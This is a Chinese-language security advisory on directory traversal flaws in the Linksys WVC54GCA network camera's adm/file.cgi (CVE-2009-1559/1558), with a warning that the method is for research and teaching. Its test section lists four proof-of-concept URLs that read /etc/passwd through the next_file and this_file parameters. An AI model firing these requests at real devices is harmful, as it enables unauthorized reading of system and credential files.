发布日期：2009-04-23
更新日期：2009-05-07

受影响系统：

Linksys WVC54GCA 1.00 R24
Linksys WVC54GCA 1.00 R22

描述：

---

BUGTRAQ  ID: 34713
CVE(CAN) ID: CVE-2009-1559,CVE-2009-1558

Linksys WVC54GCA是一款无线网络摄像头。

Linksys WVC54GCA控制台的adm/file.cgi文件存在多个目录遍历漏洞，远程攻击者可以通过在提交给该文件的this_file或next_file参数中包含目录遍历序列读取任意文件。

<*来源：pagvac
  
  链接：http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/adm/file.cgi?next_file=%2fetc%2fpasswd
http://www.example.com/adm/file.cgi?next_file=%2fetc/passwd
http://www.example.com/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd
http://www.example.com/adm/file.cgi?todo=pwnage&amp;this_file=/etc/passwd

建议：

---

厂商补丁：

Linksys
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.linksys.com

浏览次数：2677
严重程度：0（网友投票）